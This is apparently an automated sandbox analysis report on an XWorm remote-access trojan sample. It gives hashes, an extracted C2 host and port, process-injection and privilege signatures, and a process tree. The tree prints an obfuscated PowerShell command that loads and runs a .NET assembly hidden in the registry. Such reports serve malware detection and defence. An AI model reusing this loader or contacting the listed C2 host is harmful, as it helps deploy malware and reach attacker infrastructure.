Analysis
max time kernel: 60s
max time network: 16s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 01-07-2024 17:40
Static task: static1
Behavioral task: behavioral1
Sample: x4svchost.exe
Resource: win7-20240221-en
General
Target: x4svchost.exe
Size: 762KB
MD5: 148ec472df90b0fb274c3ce2ad2e811f
SHA1: 378ba02b08494b36ff5a2674cf99eba6c7025d6a
SHA256: a08b846be9052a2614ef6a6920260d465774f5da9926f6d08449a2e4eb27b787
SHA512: ab6764b598d538bc726a1e0baf02c8c4a2ccdedf77ff6b3ee63d1e27c0a05e13423142b86f38afbd9462c0d90b5c3a9963a30e110145aca455ffa5403375c5b1
SSDEEP: 12288:0sjApTtnb0TbQxMM90CL7VmADH2eJGCOTJfVXwAfIXZqPtbxZWdezgrrNo02UBYW:djuTt4TbQRjDH2eJQTNqcWOVZK1y02UH
Malware Config
Extracted
Family: xworm
C2: session-chief.gl.at.ply.gg:36125
Install_directory: %LocalAppData%
install_file: x4usb.exe
Signatures

Detect Xworm Payload (2 IoCs)
  resource                                                                      yara_rule
  C:\Users\Admin\AppData\Local\Temp\x4host.exe                                  family_xworm
  behavioral1/memory/2932-24-0x0000000001140000-0x0000000001158000-memory.dmp   family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description            pid   process         target process
  PID 2708 created 424   2708  powershell.EXE  winlogon.exe

Executes dropped EXE (2 IoCs)
  pid   process
  2344  x4Shellcode.exe
  2932  x4host.exe

Drops file in System32 directory (2 IoCs)
  description                   ioc                                                                                                                        process
  File opened for modification  C:\Windows\System32\alg.exe                                                                                                x4Shellcode.exe
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.EXE

Suspicious use of SetThreadContext (1 IoC)
  description                           pid   process         target process
  PID 2708 set thread context of 2672   2708  powershell.EXE  dllhost.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies data under HKEY_USERS (2 IoCs)
  description        ioc                                                                                                                      process
  Key created        \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage                                     powershell.EXE
  Set value (data)   \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00aef0d0ddcbda01   powershell.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   process
  2708  powershell.EXE  (2 entries)
  2672  dllhost.exe     (all remaining entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid   process
  1212  Explorer.EXE

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description                      pid   process
  Token: SeDebugPrivilege          2932  x4host.exe
  Token: SeTakeOwnershipPrivilege  2344  x4Shellcode.exe
  Token: SeDebugPrivilege          2708  powershell.EXE
  Token: SeDebugPrivilege          2708  powershell.EXE
  Token: SeDebugPrivilege          2672  dllhost.exe
  Token: SeAuditPrivilege          848   svchost.exe

Suspicious use of WriteProcessMemory (42 IoCs; repeated source/target pairs collapsed, count in last column)
  pid   process          target pid  target process    entries
  2884  x4svchost.exe    2344        x4Shellcode.exe   4
  2884  x4svchost.exe    2932        x4host.exe        3
  1328  taskeng.exe      2708        powershell.EXE    3
  2708  powershell.EXE   2672        dllhost.exe       9
  2672  dllhost.exe      424         winlogon.exe      1
  2672  dllhost.exe      476         services.exe      1
  2672  dllhost.exe      492         lsass.exe         1
  2672  dllhost.exe      500         lsm.exe           1
  2672  dllhost.exe      608         svchost.exe       1
  2672  dllhost.exe      684         svchost.exe       1
  2672  dllhost.exe      772         svchost.exe       1
  2672  dllhost.exe      812         svchost.exe       1
  2672  dllhost.exe      848         svchost.exe       1
  2672  dllhost.exe      972         svchost.exe       1
  2672  dllhost.exe      240         svchost.exe       1
  2672  dllhost.exe      296         spoolsv.exe       1
  2672  dllhost.exe      1076        svchost.exe       1
  2672  dllhost.exe      1112        taskhost.exe      1
  2672  dllhost.exe      1160        Dwm.exe           1
  2672  dllhost.exe      1212        Explorer.EXE      1
  2672  dllhost.exe      1612        DllHost.exe       1
  2672  dllhost.exe      3020        svchost.exe       1
  2672  dllhost.exe      2980        sppsvc.exe        1
  2672  dllhost.exe      2932        x4host.exe        1
  2672  dllhost.exe      1328        taskeng.exe       1
  2672  dllhost.exe      2708        powershell.EXE    1
  2672  dllhost.exe      2728        conhost.exe       1
Processes (indented by depth in the process tree; each entry gives the image path, its command line, and the signatures that fired on it)

C:\Windows\system32\winlogon.exe
  cmd: winlogon.exe
  C:\Windows\System32\dllhost.exe
    cmd: C:\Windows\System32\dllhost.exe /Processid:{9105bb3f-5047-4b83-b5b0-4e0077a03796}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

C:\Windows\system32\services.exe
  cmd: C:\Windows\system32\services.exe
  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k DcomLaunch
    C:\Windows\system32\DllHost.exe
      cmd: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k RPCSS
  C:\Windows\System32\svchost.exe
    cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  C:\Windows\System32\svchost.exe
    cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
    C:\Windows\system32\Dwm.exe
      cmd: "C:\Windows\system32\Dwm.exe"
  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k netsvcs
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\taskeng.exe
      cmd: taskeng.exe {B0AEA794-863D-4A0B-8EDA-068C24AE98F6} S-1-5-18:NT AUTHORITY\System:Service:
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](120)+''+[Char](52)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in System32 directory
        - Suspicious use of SetThreadContext
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k LocalService
  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k NetworkService
  C:\Windows\System32\spoolsv.exe
    cmd: C:\Windows\System32\spoolsv.exe
  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  C:\Windows\system32\taskhost.exe
    cmd: "taskhost.exe"
  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  C:\Windows\system32\sppsvc.exe
    cmd: C:\Windows\system32\sppsvc.exe

C:\Windows\system32\lsass.exe
  cmd: C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe
  cmd: C:\Windows\system32\lsm.exe

C:\Windows\Explorer.EXE
  cmd: C:\Windows\Explorer.EXE
  - Suspicious behavior: GetForegroundWindowSpam
  C:\Users\Admin\AppData\Local\Temp\x4svchost.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\x4svchost.exe"
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Local\Temp\x4host.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\x4host.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\conhost.exe
  cmd: \??\C:\Windows\system32\conhost.exe "1362757830-21384515393198194417472438931599184708161984345819503547441451025981"
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
  Filesize: 731KB
  MD5: 851be4e85b0f111883680e87099483a3
  SHA1: 155e19ad0d2ec4bef3ba25512b6e8bc403350ec9
  SHA256: ba2d2058ab95d39a9c05c9c74dfa7c860cc662f33ecd96c35f2c344666472197
  SHA512: bcfd99df20ba3e713801f9c41bc924379f4f6078703ec1d44e90ec3649aa1b2fce6ce802a71a0297516ccf344c627c91359434b7166d716dea69ab41c1fecce6

C:\Users\Admin\AppData\Local\Temp\x4host.exe
  Filesize: 68KB
  MD5: fd744070409a72b86cc2b344d1719b33
  SHA1: d58ded881812057a3b51e6f753ffbfe243af112e
  SHA256: d2fd71588dd2d33c5ad58c1a5382de38227ad86092cae7401ee95c7701282730
  SHA512: 8ebde5880105f2831377c26800fdd2b482bd2fdfc5c5539ce0901828d78bd1d2475474cc5859e3a0f92a305a21bd3c1c98834e1746402d708e84622e088717d9
Memory dumps (dump name as pid-index, dumped address range, filesize):
  memory/424-46    0x0000000000B90000-0x0000000000BB6000   152KB
  memory/424-48    0x0000000000B90000-0x0000000000BB6000   152KB
  memory/424-49    0x0000000000C40000-0x0000000000C6C000   176KB
  memory/424-50    0x0000000000C40000-0x0000000000C6C000   176KB
  memory/424-56    0x0000000000C40000-0x0000000000C6C000   176KB
  memory/424-57    0x000007FEBE200000-0x000007FEBE210000   64KB
  memory/424-58    0x00000000371E0000-0x00000000371F0000   64KB
  memory/476-72    0x00000000371E0000-0x00000000371F0000   64KB
  memory/476-71    0x000007FEBE200000-0x000007FEBE210000   64KB
  memory/476-70    0x0000000000C50000-0x0000000000C7C000   176KB
  memory/476-64    0x0000000000C50000-0x0000000000C7C000   176KB
  memory/492-78    0x00000000000E0000-0x000000000010C000   176KB
  memory/492-84    0x00000000000E0000-0x000000000010C000   176KB
  memory/492-85    0x000007FEBE200000-0x000007FEBE210000   64KB
  memory/492-86    0x00000000371E0000-0x00000000371F0000   64KB
  memory/2344-29   0x0000000000400000-0x00000000004B9000   740KB
  memory/2344-22   0x0000000000390000-0x00000000003F7000   412KB
  memory/2344-11   0x0000000000390000-0x00000000003F7000   412KB
  memory/2344-10   0x0000000000400000-0x00000000004B9000   740KB
  memory/2672-36   0x0000000140000000-0x0000000140008000   32KB
  memory/2672-35   0x0000000140000000-0x0000000140008000   32KB
  memory/2672-42   0x0000000076F80000-0x000000007709F000   1.1MB
  memory/2672-43   0x0000000140000000-0x0000000140008000   32KB
  memory/2672-40   0x0000000140000000-0x0000000140008000   32KB
  memory/2672-41   0x00000000771A0000-0x0000000077349000   1.7MB
  memory/2672-38   0x0000000140000000-0x0000000140008000   32KB
  memory/2672-37   0x0000000140000000-0x0000000140008000   32KB
  memory/2708-30   0x000000001A110000-0x000000001A3F2000   2.9MB
  memory/2708-34   0x0000000076F80000-0x000000007709F000   1.1MB
  memory/2708-33   0x00000000771A0000-0x0000000077349000   1.7MB
  memory/2708-32   0x00000000013B0000-0x00000000013DA000   168KB
  memory/2708-31   0x0000000000870000-0x0000000000878000   32KB
  memory/2884-0    0x000007FEF5543000-0x000007FEF5544000   4KB
  memory/2884-25   0x000007FEF5540000-0x000007FEF5F2C000   9.9MB
  memory/2884-4    0x000007FEF5540000-0x000007FEF5F2C000   9.9MB
  memory/2884-1    0x0000000000B40000-0x0000000000C04000   784KB
  memory/2932-23   0x000007FEF5543000-0x000007FEF5544000   4KB
  memory/2932-24   0x0000000001140000-0x0000000001158000   96KB